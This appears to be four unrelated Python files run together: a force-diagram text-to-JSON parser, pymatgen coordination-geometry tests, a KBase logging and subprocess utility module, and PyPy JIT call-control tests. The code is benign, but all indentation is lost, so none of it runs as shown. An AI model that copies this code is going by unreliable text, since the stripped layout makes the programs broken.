edges = self.diagramJson.json['force']['edges']
for line in f_edge_vertex:
edge = line.strip().split('\t')
edges[edge[0]] = edge[1:]
# print edges
f_edge_vertex.close()
# print self.diagramJson.json
def readForceFaceEdge(self, filename_face_edge):
f_face_edge = open(filename_face_edge)
edges = self.diagramJson.json['force']['edges']
faces_e = self.diagramJson.json['force']['faces_e']
# faces_v = self.diagramJson.json['force']['faces_v']
for line in f_face_edge:
face = line.strip().split('\t')
faces_e[face[0]] = face[1:]
# # convert face edge to face vertex
# cur_face_vertex = Set()
# for e in face[1:]:
# # extend vertex array
# # cur_face_vertex.extend(edges[e])
# for v in edges[e]:
# cur_face_vertex.add(v)
# faces_v[face[0]] = list(cur_face_vertex)
# print faces_v[face[0]]
f_face_edge.close()
# print self.diagramJson.json
def readForceFaceVertex(self, filename_face_vertex):
f_face_vertex = open(filename_face_vertex)
# fan shape order
faces_v = self.diagramJson.json['force']['faces_v']
strengthScaler = self.diagramJson.json['strength_scaler']
force_face_2_strength = self.diagramJson.json['force_face_2_strength']
v = self.diagramJson.json['force']['vertices']
e = self.diagramJson.json['form']['edges']
for line in f_face_vertex:
face = line.strip().split('\t')
faces_v[face[0]] = face[1:]
strength = 0
if len(face) == 4:
# tri
strength = area( v[face[1]], v[face[2]], v[face[3]] )
elif len(face) == 5:
# quad
strength = area( v[face[1]], v[face[2]], v[face[3]] ) + area( v[face[1]], v[face[3]], v[face[4]] )
else:
print 'Error: face ', face[0], ' is not tri or quad!!'
# if face[0] == '17f' or face[0] == '19f':
# print face[0], face[1:], map( lambda vid: v[vid], face[1:] ), area(v[face[1]], v[face[2]], v[face[3]]), strength
# e[ self.force_face_2_form_edge[face[0]] ]['strength'] = strength
force_face_2_strength[ face[0] ] = strength
curEdge = e[ self.force_face_2_form_edge[face[0]] ]
if 'external' not in curEdge and 'ex_force' not in curEdge:
strengthScaler['max'] = max(strength, strengthScaler['max'])
strengthScaler['min'] = min(strength, strengthScaler['min'])
f_face_vertex.close()
if __name__ == "__main__":
# foldername = "example_01"
# foldername = "example_02"
# foldername = "example_03"
foldername = "example_04"
parser = Txt2JsonParser()
parser.readFormVertex(foldername + "/form_v.txt")
parser.readFormEdge(foldername + "/form_e_v.txt", \
foldername + "/form_e_to_force_f.txt", \
foldername + "/form_e_ex.txt")
parser.readForceVertex(foldername + "/force_v.txt")
parser.readForceEdge(foldername + "/force_e_v.txt")
# parser.readForceFaceEdge(foldername + "/force_f_e.txt")
parser.readForceFaceVertex(foldername + "/force_f_v.txt")
with open(foldername + '/diagram.json', 'w') as out:
json.dump(parser.diagramJson.json, out)
|
__author__ = 'waroquiers'
import unittest
import numpy as np
from pymatgen.util.testing import PymatgenTest
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import ExplicitPermutationsAlgorithm
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import SeparationPlane
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import AllCoordinationGeometries
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import CoordinationGeometry
allcg = AllCoordinationGeometries()
class FakeSite:
def __init__(self, coords):
self.coords = coords
class CoordinationGeometriesTest(PymatgenTest):
def test_algorithms(self):
expl_algo = ExplicitPermutationsAlgorithm(permutations=[[0, 1, 2], [1, 2, 3]])
expl_algo2 = ExplicitPermutationsAlgorithm.from_dict(expl_algo.as_dict)
self.assertEqual(expl_algo.permutations, expl_algo2.permutations)
sepplane_algos_oct = allcg['O:6'].algorithms
self.assertEqual(len(sepplane_algos_oct[0].safe_separation_permutations()), 24)
self.assertEqual(len(sepplane_algos_oct[1].safe_separation_permutations()), 36)
sepplane_algos_oct_0 = SeparationPlane.from_dict(sepplane_algos_oct[0].as_dict)
self.assertEqual(sepplane_algos_oct[0].plane_points, sepplane_algos_oct_0.plane_points)
self.assertEqual(sepplane_algos_oct[0].mirror_plane, sepplane_algos_oct_0.mirror_plane)
self.assertEqual(sepplane_algos_oct[0].ordered_plane, sepplane_algos_oct_0.ordered_plane)
self.assertEqual(sepplane_algos_oct[0].point_groups, sepplane_algos_oct_0.point_groups)
self.assertEqual(sepplane_algos_oct[0].ordered_point_groups, sepplane_algos_oct_0.ordered_point_groups)
self.assertTrue(all([np.array_equal(perm, sepplane_algos_oct_0.explicit_optimized_permutations[iperm])
for iperm, perm in enumerate(sepplane_algos_oct[0].explicit_optimized_permutations)]))
self.assertEqual(sepplane_algos_oct[0].__str__(),
'Separation plane algorithm with the following reference separation :\n'
'[[4]] | [[0, 2, 1, 3]] | [[5]]')
def test_hints(self):
hints = CoordinationGeometry.NeighborsSetsHints(hints_type='single_cap',
options={'cap_index': 2, 'csm_max': 8})
myhints = hints.hints({'csm': 12.0})
self.assertEqual(myhints, [])
hints2 = CoordinationGeometry.NeighborsSetsHints.from_dict(hints.as_dict())
self.assertEqual(hints.hints_type, hints2.hints_type)
self.assertEqual(hints.options, hints2.options)
def test_coordination_geometry(self):
cg_oct = allcg['O:6']
cg_oct2 = CoordinationGeometry.from_dict(cg_oct.as_dict())
self.assertArrayAlmostEqual(cg_oct.central_site, cg_oct2.central_site)
self.assertArrayAlmostEqual(cg_oct.points, cg_oct2.points)
self.assertEqual(cg_oct.__str__(), 'Coordination geometry type : Octahedron (IUPAC: OC-6 || IUCr: [6o])\n'
'\n'
' - coordination number : 6\n'
' - list of points :\n'
' - [0.0, 0.0, 1.0]\n'
' - [0.0, 0.0, -1.0]\n'
' - [1.0, 0.0, 0.0]\n'
' - [-1.0, 0.0, 0.0]\n'
' - [0.0, 1.0, 0.0]\n'
' - [0.0, -1.0, 0.0]\n'
'------------------------------------------------------------\n')
self.assertEqual(cg_oct.__len__(), 6)
self.assertEqual(cg_oct.ce_symbol, cg_oct.mp_symbol)
self.assertTrue(cg_oct.is_implemented())
self.assertEqual(cg_oct.get_name(), 'Octahedron')
self.assertEqual(cg_oct.IUPAC_symbol, 'OC-6')
self.assertEqual(cg_oct.IUPAC_symbol_str, 'OC-6')
self.assertEqual(cg_oct.IUCr_symbol, '[6o]')
self.assertEqual(cg_oct.IUCr_symbol_str, '[6o]')
cg_oct.permutations_safe_override = True
self.assertEqual(cg_oct.number_of_permutations, 720.0)
self.assertEqual(cg_oct.ref_permutation([0, 3, 2, 4, 5, 1]), (0, 3, 1, 5, 2, 4))
sites = [FakeSite(coords=pp) for pp in cg_oct.points]
faces = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
[[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]],
[[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
[[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, -1.0, 0.0]],
[[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]]]
self.assertArrayAlmostEqual(cg_oct.faces(sites=sites, permutation=[0, 3, 2, 4, 5, 1]), faces)
faces = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]]]
self.assertArrayAlmostEqual(cg_oct.faces(sites=sites), faces)
edges = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, 0.0, -1.0]],
[[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0]],
[[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
[[1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
[[0.0, 1.0, 0.0], [0.0, -1.0, 0.0]],
[[0.0, 1.0, 0.0], [0.0, 0.0, -1.0]]]
self.assertArrayAlmostEqual(cg_oct.edges(sites=sites, permutation=[0, 3, 2, 4, 5, 1]), edges)
edges = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
[[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, -1.0, 0.0]],
[[0.0, 0.0, -1.0], [1.0, 0.0, 0.0]],
[[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]],
[[0.0, 0.0, -1.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, -1.0], [0.0, -1.0, 0.0]],
[[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
[[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
[[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]]]
self.assertArrayAlmostEqual(cg_oct.edges(sites=sites), edges)
self.assertArrayAlmostEqual(cg_oct.solid_angles(),
[2.0943951, 2.0943951, 2.0943951, 2.0943951, 2.0943951, 2.0943951])
pmeshes = cg_oct.get_pmeshes(sites=sites)
self.assertEqual(pmeshes[0]['pmesh_string'],
'14\n 0.00000000 0.00000000 1.00000000\n'
' 0.00000000 0.00000000 -1.00000000\n'
' 1.00000000 0.00000000 0.00000000\n'
' -1.00000000 0.00000000 0.00000000\n'
' 0.00000000 1.00000000 0.00000000\n'
' 0.00000000 -1.00000000 0.00000000\n'
' 0.33333333 0.33333333 0.33333333\n'
' 0.33333333 -0.33333333 0.33333333\n'
' -0.33333333 0.33333333 0.33333333\n'
' -0.33333333 -0.33333333 0.33333333\n'
' 0.33333333 0.33333333 -0.33333333\n'
' 0.33333333 -0.33333333 -0.33333333\n'
' -0.33333333 0.33333333 -0.33333333\n'
' -0.33333333 -0.33333333 -0.33333333\n'
'8\n4\n0\n2\n4\n0\n4\n0\n2\n5\n0\n4\n0\n3\n4\n0\n'
'4\n0\n3\n5\n0\n4\n1\n2\n4\n1\n4\n1\n2\n5\n1\n4\n'
'1\n3\n4\n1\n4\n1\n3\n5\n1\n')
allcg_str = allcg.__str__()
self.assertTrue('\n#=======================================================#\n'
'# List of coordination geometries currently implemented #\n'
'#=======================================================#\n'
'\nCoordination geometry type : Single neighbor (IUCr: [1l])\n\n'
' - coordination number : 1\n'
' - list of points :\n'
' - [0.0, 0.0, 1.0]\n'
'------------------------------------------------------------\n\n' in allcg_str)
self.assertTrue('Coordination geometry type : Trigonal plane (IUPAC: TP-3 || IUCr: [3l])\n\n'
' - coordination number : 3\n'
' - list of points :\n' in allcg_str)
all_symbols = [u'S:1', u'L:2', u'A:2', u'TL:3', u'TY:3', u'TS:3', u'T:4', u'S:4', u'SY:4', u'SS:4',
u'PP:5', u'S:5', u'T:5', u'O:6', u'T:6', u'PP:6', u'PB:7', u'ST:7', u'ET:7', u'FO:7',
u'C:8', u'SA:8', u'SBT:8', u'TBT:8', u'DD:8', u'DDPN:8', u'HB:8', u'BO_1:8', u'BO_2:8',
u'BO_3:8', u'TC:9', u'TT_1:9', u'TT_2:9', u'TT_3:9', u'HD:9', u'TI:9', u'SMA:9', u'SS:9',
u'TO_1:9', u'TO_2:9', u'TO_3:9', u'PP:10', u'PA:10', u'SBSA:10', u'MI:10', u'S:10',
u'H:10', u'BS_1:10', u'BS_2:10', u'TBSA:10', u'PCPA:11', u'H:11', u'SH:11', u'CO:11',
u'DI:11', u'I:12', u'PBP:12', u'TT:12', u'C:12', u'AC:12', u'SC:12', u'S:12', u'HP:12',
u'HA:12', u'SH:13', u'DD:20', u'UNKNOWN', u'UNCLEAR']
self.assertEqual(len(allcg.get_geometries()), 68)
self.assertEqual(len(allcg.get_geometries(coordination=3)), 3)
self.assertEqual(sorted(allcg.get_geometries(returned='mp_symbol')), sorted(all_symbols))
self.assertEqual(sorted(allcg.get_geometries(returned='mp_symbol', coordination=3)),
['TL:3', 'TS:3', 'TY:3'])
self.assertEqual(allcg.get_symbol_name_mapping(coordination=3),
{u'TY:3': u'Triangular non-coplanar', u'TL:3': u'Trigonal plane', u'TS:3': u'T-shaped'})
self.assertEqual(allcg.get_symbol_cn_mapping(coordination=3),
{u'TY:3': 3, u'TL:3': 3, u'TS:3': 3})
self.assertEqual(sorted(allcg.get_implemented_geometries(coordination=4, returned='mp_symbol')),
[u'S:4', u'SS:4', u'SY:4', u'T:4'])
self.assertEqual(sorted(allcg.get_not_implemented_geometries(returned='mp_symbol')),
[u'CO:11', u'DD:20', u'H:10', u'S:10', u'S:12', u'UNCLEAR', u'UNKNOWN'])
self.assertEqual(allcg.get_geometry_from_name('Octahedron').mp_symbol, cg_oct.mp_symbol)
with self.assertRaises(LookupError) as cm:
allcg.get_geometry_from_name('Octahedran')
self.assertEqual(str(cm.exception), 'No coordination geometry found with name "Octahedran"')
self.assertEqual(allcg.get_geometry_from_IUPAC_symbol('OC-6').mp_symbol, cg_oct.mp_symbol)
with self.assertRaises(LookupError) as cm:
allcg.get_geometry_from_IUPAC_symbol('OC-7')
self.assertEqual(str(cm.exception), 'No coordination geometry found with IUPAC symbol "OC-7"')
self.assertEqual(allcg.get_geometry_from_IUCr_symbol('[6o]').mp_symbol, cg_oct.mp_symbol)
with self.assertRaises(LookupError) as cm:
allcg.get_geometry_from_IUCr_symbol('[6oct]')
self.assertEqual(str(cm.exception), 'No coordination geometry found with IUCr symbol "[6oct]"')
with self.assertRaises(LookupError) as cm:
allcg.get_geometry_from_mp_symbol('O:7')
self.assertEqual(str(cm.exception), 'No coordination geometry found with mp_symbol "O:7"')
self.assertEqual(allcg.pretty_print(maxcn=4),
'+-------------------------+\n| Coordination geometries |\n+-------------------------+\n'
'\n==>> CN = 1 <<==\n - S:1 : Single neighbor\n\n'
'==>> CN = 2 <<==\n'
' - L:2 : Linear\n - A:2 : Angular\n\n'
'==>> CN = 3 <<==\n'
' - TL:3 : Trigonal plane\n - TY:3 : Triangular non-coplanar\n - TS:3 : T-shaped\n\n'
'==>> CN = 4 <<==\n - T:4 : Tetrahedron\n - S:4 : Square plane\n'
' - SY:4 : Square non-coplanar\n - SS:4 : See-saw\n\n')
self.assertEqual(allcg.pretty_print(maxcn=2, type='all_geometries_latex'),
'\\subsection*{Coordination 1}\n\n\\begin{itemize}\n'
'\\item S:1 $\\rightarrow$ Single neighbor (IUPAC : None - IUCr : $[$1l$]$)\n'
'\\end{itemize}\n\n\\subsection*{Coordination 2}\n\n\\begin{itemize}\n'
'\\item L:2 $\\rightarrow$ Linear (IUPAC : L-2 - IUCr : $[$2l$]$)\n'
'\\item A:2 $\\rightarrow$ Angular (IUPAC : A-2 - IUCr : $[$2n$]$)\n'
'\\end{itemize}\n\n')
self.assertEqual(allcg.pretty_print(maxcn=2, type='all_geometries_latex_images'),
'\\section*{Coordination 1}\n\n\\subsubsection*{S:1 : Single neighbor}\n\n'
'IUPAC : None\n\nIUCr : [1l]\n\n\\begin{center}\n'
'\\includegraphics[scale=0.15]{images/S_1.png}\n'
'\\end{center}\n\n\\section*{Coordination 2}\n\n'
'\\subsubsection*{L:2 : Linear}\n\nIUPAC : L-2\n\n'
'IUCr : [2l]\n\n\\begin{center}\n\\includegraphics[scale=0.15]{images/L_2.png}\n'
'\\end{center}\n\n\\subsubsection*{A:2 : Angular}\n\nIUPAC : A-2\n\nIUCr : [2n]\n\n'
'\\begin{center}\n\\includegraphics[scale=0.15]{images/A_2.png}\n\\end{center}\n\n')
self.assertDictEqual(allcg.minpoints, {6: 2, 7: 2, 8: 2, 9: 2, 10: 2, 11: 2, 12: 2, 13: 3})
self.assertDictEqual(allcg.maxpoints, {6: 5, 7: 5, 8: 6, 9: 7, 10: 6, 11: 5, 12: 8, 13: 6})
self.assertDictEqual(allcg.maxpoints_inplane, {6: 5, 7: 5, 8: 6, 9: 7, 10: 6, 11: 5, 12: 8, 13: 6})
self.assertDictEqual(allcg.separations_cg, {6: {(0, 3, 3): [u'O:6', u'T:6'],
(1, 4, 1): [u'O:6'],
(0, 5, 1): [u'PP:6'],
(2, 2, 2): [u'PP:6'],
(0, 4, 2): [u'T:6']},
7: {(1, 3, 3): [u'ET:7', u'FO:7'],
(2, 3, 2): [u'PB:7', u'ST:7', u'ET:7'],
(1, 4, 2): [u'ST:7', u'FO:7'],
(1, 5, 1): [u'PB:7']},
8: {(1, 6, 1): [u'HB:8'],
(0, 4, 4):
[u'C:8', u'SA:8', u'SBT:8'],
(1, 4, 3): [u'SA:8', u'SBT:8', u'BO_2:8', u'BO_3:8'],
(2, 4, 2): [u'C:8', u'TBT:8', u'DD:8', u'DDPN:8', u'HB:8',
u'BO_1:8', u'BO_1:8', u'BO_2:8', u'BO_2:8',
u'BO_3:8', u'BO_3:8']},
9: {(3, 3, 3): [u'TT_1:9', u'TT_1:9', u'TT_2:9', u'SMA:9',
u'SMA:9', u'TO_1:9', u'TO_3:9'],
(0, 6, 3): [u'TC:9'],
(2, 4, 3): [u'TC:9', u'TT_2:9', u'TT_3:9', u'TI:9',
u'SS:9', u'TO_1:9', u'TO_1:9', u'TO_2:9',
u'TO_3:9'],
(1, 3, 5): [u'TI:9'],
(1, 4, 4): [u'TT_1:9', u'SMA:9', u'SS:9'],
(2, 3, 4): [u'TC:9'],
(2, 5, 2): [u'TT_3:9', u'SS:9', u'TO_2:9'],
(1, 7, 1): [u'HD:9']},
10: {(0, 5, 5): [u'PP:10', u'PA:10'],
(3, 4, 3): [u'PA:10', u'SBSA:10', u'MI:10',
u'BS_2:10', u'TBSA:10'],
(2, 6, 2): [u'BS_1:10'],
(2, 4, 4): [u'PP:10', u'MI:10', u'BS_2:10'],
(3, 3, 4): [u'SBSA:10'],
(1, 4, 5): [u'BS_2:10'],
(0, 4, 6): [u'BS_1:10', u'TBSA:10']},
11: {(4, 3, 4): [u'PCPA:11'],
(3, 4, 4): [u'DI:11'],
(1, 5, 5): [u'PCPA:11', u'DI:11'],
(3, 5, 3): [u'H:11']},
12: {(3, 3, 6): [u'TT:12'],
(2, 4, 6): [u'TT:12'],
(0, 6, 6): [u'HP:12', u'HA:12'],
(3, 6, 3): [u'C:12', u'AC:12'],
(4, 4, 4): [u'I:12', u'PBP:12', u'C:12', u'HP:12'],
(0, 8, 4): [u'SC:12']},
13: {(0, 6, 7): [u'SH:13']}})
if __name__ == "__main__":
unittest.main()
|
import logging
import os
import subprocess
import traceback
from zipfile import ZipFile
from os import listdir
from os.path import isfile, join
'''
A utility python module containing a set of methods necessary for this kbase
module.
'''
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
def create_logger(log_dir, name):
"""Create a logger
args: name (str): name of logger
returns: logger (obj): logging.Logger instance
"""
logger = logging.getLogger(name)
fmt = logging.Formatter('%(asctime)s - %(process)d - %(name)s - '
' %(levelname)s -%(message)s')
hdl = logging.FileHandler(os.path.join(log_dir, name + '.log'))
hdl.setFormatter(fmt)
logger.addHandler(hdl)
return logger
def if_obj_exists(logger, ws_client, ws_id, o_type, obj_l):
obj_list = ws_client.list_objects({"workspaces": [ws_id], "type": o_type, 'showHidden': 1})
obj_names = [i[1] for i in obj_list]
existing_names = [i for i in obj_l if i in obj_names]
obj_ids = None
if len(existing_names) != 0:
e_queries = [{'name': j, 'workspace': ws_id} for j in existing_names]
e_infos = ws_client.get_object_info_new({"objects": e_queries})
obj_ids = [(str(k[1]), (str(k[6]) + '/' + str(k[0]) + '/' + str(k[4]))) for k in e_infos]
return obj_ids
def log(message, level=logging.INFO, logger=None):
if logger is None:
if level == logging.DEBUG:
print('\nDEBUG: ' + message + '\n')
elif level == logging.INFO:
print('\nINFO: ' + message + '\n')
elif level == logging.WARNING:
print('\nWARNING: ' + message + '\n')
elif level == logging.ERROR:
print('\nERROR: ' + message + '\n')
elif level == logging.CRITICAL:
print('\nCRITICAL: ' + message + '\n')
else:
logger.log(level, '\n' + message + '\n')
def zip_files(logger, src_path, output_fn):
"""
Compress all index files (not directory) into an output zip file on disk.
"""
files = [f for f in listdir(src_path) if isfile(join(src_path, f))]
with ZipFile(output_fn, 'w', allowZip64=True) as izip:
for f in files:
izip.write(join(src_path, f), f)
def unzip_files(logger, src_fn, dst_path):
"""
Extract all index files into an output zip file on disk.
"""
with ZipFile(src_fn, 'r') as ozip:
ozip.extractall(dst_path)
def whereis(program):
"""
returns path of program if it exists in your ``$PATH`` variable or `
`None`` otherwise
"""
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and not os.path.isdir(
os.path.join(path, program)):
return os.path.join(path, program)
return None
def runProgram(logger=None,
progName=None,
argStr=None,
script_dir=None,
working_dir=None):
"""
Convenience func to handle calling and monitoring output of external programs.
:param progName: name of system program command
:param argStr: string containing command line options for ``progName``
:returns: subprocess.communicate object
"""
# Ensure program is callable.
if script_dir is not None:
progPath = os.path.join(script_dir, progName)
else:
progPath = progName
progPath = whereis(progName)
if not progPath:
raise RuntimeError(
None,
'{0} command not found in your PATH environmental variable. {1}'.format(
progName,
os.environ.get(
'PATH',
'')))
# Construct shell command
cmdStr = "%s %s" % (progPath, argStr)
print "Executing : " + cmdStr
if logger is not None:
logger.info("Executing : " + cmdStr)
# if working_dir is None:
logger.info("Executing: " + cmdStr + " on cwd")
else:
logger.info("Executing: " + cmdStr + " on " + working_dir)
# Set up process obj
process = subprocess.Popen(cmdStr,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir)
# Get results
result, stderr = process.communicate()
# print result
# print stderr
# keep this until your code is stable for easier debugging
if logger is not None and result is not None and len(result) > 0:
logger.info(result)
else:
print result
if logger is not None and stderr is not None and len(stderr) > 0:
logger.info(stderr)
else:
print stderr
# Check returncode for success/failure
if process.returncode != 0:
raise Exception("Command execution failed {0}".format(
"".join(traceback.format_exc())))
raise RuntimeError(
'Return Code : {0} , result {1} , progName {2}'.format(
process.returncode, result, progName))
# Return result
return {"result": result, "stderr": stderr}
def check_sys_stat(logger):
check_disk_space(logger)
check_memory_usage(logger)
check_cpu_usage(logger)
def check_disk_space(logger):
runProgram(logger=logger, progName="df", argStr="-h")
def check_memory_usage(logger):
runProgram(logger=logger, progName="vmstat", argStr="-s")
def check_cpu_usage(logger):
runProgram(logger=logger, progName="mpstat", argStr="-P ALL")
|
import py
from rpython.flowspace.model import SpaceOperation, Constant, Variable
from rpython.rtyper.lltypesystem import lltype, llmemory, rffi
from rpython.translator.unsimplify import varoftype
from rpython.rlib import jit
from rpython.jit.codewriter import support, call
from rpython.jit.codewriter.call import CallControl
from rpython.jit.codewriter.effectinfo import EffectInfo
class FakePolicy:
def look_inside_graph(self, graph):
return True
def test_graphs_from_direct_call():
cc = CallControl()
F = lltype.FuncType([], lltype.Signed)
f = lltype.functionptr(F, 'f', graph='fgraph')
v = varoftype(lltype.Signed)
op = SpaceOperation('direct_call', [Constant(f, lltype.Ptr(F))], v)
#
lst = cc.graphs_from(op, {}.__contains__)
assert lst is None # residual call
#
lst = cc.graphs_from(op, {'fgraph': True}.__contains__)
assert lst == ['fgraph'] # normal call
def test_graphs_from_indirect_call():
cc = CallControl()
F = lltype.FuncType([], lltype.Signed)
v = varoftype(lltype.Signed)
graphlst = ['f1graph', 'f2graph']
op = SpaceOperation('indirect_call', [varoftype(lltype.Ptr(F)),
Constant(graphlst, lltype.Void)], v)
#
lst = cc.graphs_from(op, {'f1graph': True, 'f2graph': True}.__contains__)
assert lst == ['f1graph', 'f2graph'] # normal indirect call
#
lst = cc.graphs_from(op, {'f1graph': True}.__contains__)
assert lst == ['f1graph'] # indirect call, look only inside some graphs
#
lst = cc.graphs_from(op, {}.__contains__)
assert lst is None # indirect call, don't look inside any graph
def test_graphs_from_no_target():
cc = CallControl()
F = lltype.FuncType([], lltype.Signed)
v = varoftype(lltype.Signed)
op = SpaceOperation('indirect_call', [varoftype(lltype.Ptr(F)),
Constant(None, lltype.Void)], v)
lst = cc.graphs_from(op, {}.__contains__)
assert lst is None
class FakeJitDriverSD:
def __init__(self, portal_graph):
self.portal_graph = portal_graph
self.portal_runner_ptr = "???"
def test_find_all_graphs():
def g(x):
return x + 2
def f(x):
return g(x) + 1
rtyper = support.annotate(f, [7])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
funcs = set([graph.func for graph in res])
assert funcs == set([f, g])
def test_find_all_graphs_without_g():
def g(x):
return x + 2
def f(x):
return g(x) + 1
rtyper = support.annotate(f, [7])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(jitdrivers_sd=[jitdriver_sd])
class CustomFakePolicy:
def look_inside_graph(self, graph):
assert graph.name == 'g'
return False
res = cc.find_all_graphs(CustomFakePolicy())
funcs = [graph.func for graph in res]
assert funcs == [f]
def test_guess_call_kind_and_calls_from_graphs():
class portal_runner_obj:
graph = object()
class FakeJitDriverSD:
portal_runner_ptr = portal_runner_obj
g = object()
g1 = object()
cc = CallControl(jitdrivers_sd=[FakeJitDriverSD()])
cc.candidate_graphs = [g, g1]
op = SpaceOperation('direct_call', [Constant(portal_runner_obj)],
Variable())
assert cc.guess_call_kind(op) == 'recursive'
class fakeresidual:
_obj = object()
op = SpaceOperation('direct_call', [Constant(fakeresidual)],
Variable())
assert cc.guess_call_kind(op) == 'residual'
class funcptr:
class _obj:
class graph:
class func:
oopspec = "spec"
op = SpaceOperation('direct_call', [Constant(funcptr)],
Variable())
assert cc.guess_call_kind(op) == 'builtin'
class funcptr:
class _obj:
graph = g
op = SpaceOperation('direct_call', [Constant(funcptr)],
Variable())
res = cc.graphs_from(op)
assert res == [g]
assert cc.guess_call_kind(op) == 'regular'
class funcptr:
class _obj:
graph = object()
op = SpaceOperation('direct_call', [Constant(funcptr)],
Variable())
res = cc.graphs_from(op)
assert res is None
assert cc.guess_call_kind(op) == 'residual'
h = object()
op = SpaceOperation('indirect_call', [Variable(),
Constant([g, g1, h])],
Variable())
res = cc.graphs_from(op)
assert res == [g, g1]
assert cc.guess_call_kind(op) == 'regular'
op = SpaceOperation('indirect_call', [Variable(),
Constant([h])],
Variable())
res = cc.graphs_from(op)
assert res is None
assert cc.guess_call_kind(op) == 'residual'
def test_get_jitcode(monkeypatch):
from rpython.jit.codewriter.test.test_flatten import FakeCPU
class FakeRTyper:
class annotator:
translator = None
def getfunctionptr(graph):
F = lltype.FuncType([], lltype.Signed)
return lltype.functionptr(F, 'bar')
monkeypatch.setattr(call, 'getfunctionptr', getfunctionptr)
cc = CallControl(FakeCPU(FakeRTyper()))
class somegraph:
name = "foo"
jitcode = cc.get_jitcode(somegraph)
assert jitcode is cc.get_jitcode(somegraph) # caching
assert jitcode.name == "foo"
pending = list(cc.enum_pending_graphs())
assert pending == [(somegraph, jitcode)]
def test_jit_force_virtualizable_effectinfo():
py.test.skip("XXX add a test for CallControl.getcalldescr() -> EF_xxx")
def test_releases_gil_analyzer():
from rpython.jit.backend.llgraph.runner import LLGraphCPU
T = rffi.CArrayPtr(rffi.TIME_T)
external = rffi.llexternal("time", [T], rffi.TIME_T, releasegil=True)
@jit.dont_look_inside
def f():
return external(lltype.nullptr(T.TO))
rtyper = support.annotate(f, [])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
[f_graph] = [x for x in res if x.func is f]
[block, _] = list(f_graph.iterblocks())
[op] = block.operations
call_descr = cc.getcalldescr(op)
assert call_descr.extrainfo.has_random_effects()
assert call_descr.extrainfo.is_call_release_gil() is False
def test_call_release_gil():
from rpython.jit.backend.llgraph.runner import LLGraphCPU
T = rffi.CArrayPtr(rffi.TIME_T)
external = rffi.llexternal("time", [T], rffi.TIME_T, releasegil=True,
save_err=rffi.RFFI_SAVE_ERRNO)
# no jit.dont_look_inside in this test
def f():
return external(lltype.nullptr(T.TO))
rtyper = support.annotate(f, [])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
[llext_graph] = [x for x in res if x.func is external]
[block, _] = list(llext_graph.iterblocks())
[op] = block.operations
tgt_tuple = op.args[0].value._obj.graph.func._call_aroundstate_target_
assert type(tgt_tuple) is tuple and len(tgt_tuple) == 2
call_target, saveerr = tgt_tuple
assert saveerr == rffi.RFFI_SAVE_ERRNO
call_target = llmemory.cast_ptr_to_adr(call_target)
call_descr = cc.getcalldescr(op)
assert call_descr.extrainfo.has_random_effects()
assert call_descr.extrainfo.is_call_release_gil() is True
